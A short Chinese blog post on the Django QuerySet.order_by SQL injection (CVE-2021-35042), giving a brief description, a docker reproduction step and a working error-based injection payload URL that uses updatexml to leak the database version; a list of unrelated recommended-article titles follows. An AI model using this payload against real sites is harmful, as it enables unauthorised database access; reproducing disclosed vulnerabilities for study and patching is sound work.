漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
GoodStudyAndDayDayUp8 分钟前
初入 python Django 框架总结Lx3521 小时前
LIKE查询中索引有效利用的前缀匹配策略岁忧2 小时前
LeetCode 高频 SQL 50 题(基础版)之 【高级字符串函数 / 正则表达式 / 子句】· 上bbsh20993 小时前
WebFuture 升级提示“不能同时包含聚集KEY和大字段””的处理办法刘 大 望12 小时前
数据库-联合查询(内连接外连接),子查询,合并查询cookqq15 小时前
mongodb源码分析session异步接受asyncSourceMessage()客户端流变Message对象斯特凡今天也很帅16 小时前
clickhouse常用语句汇总——持续更新中海尔辛21 小时前
SQL 基础入门Elohim8151 天前
数据库SQLite基础噼里啪啦啦.1 天前
Spring事务和事务传播机制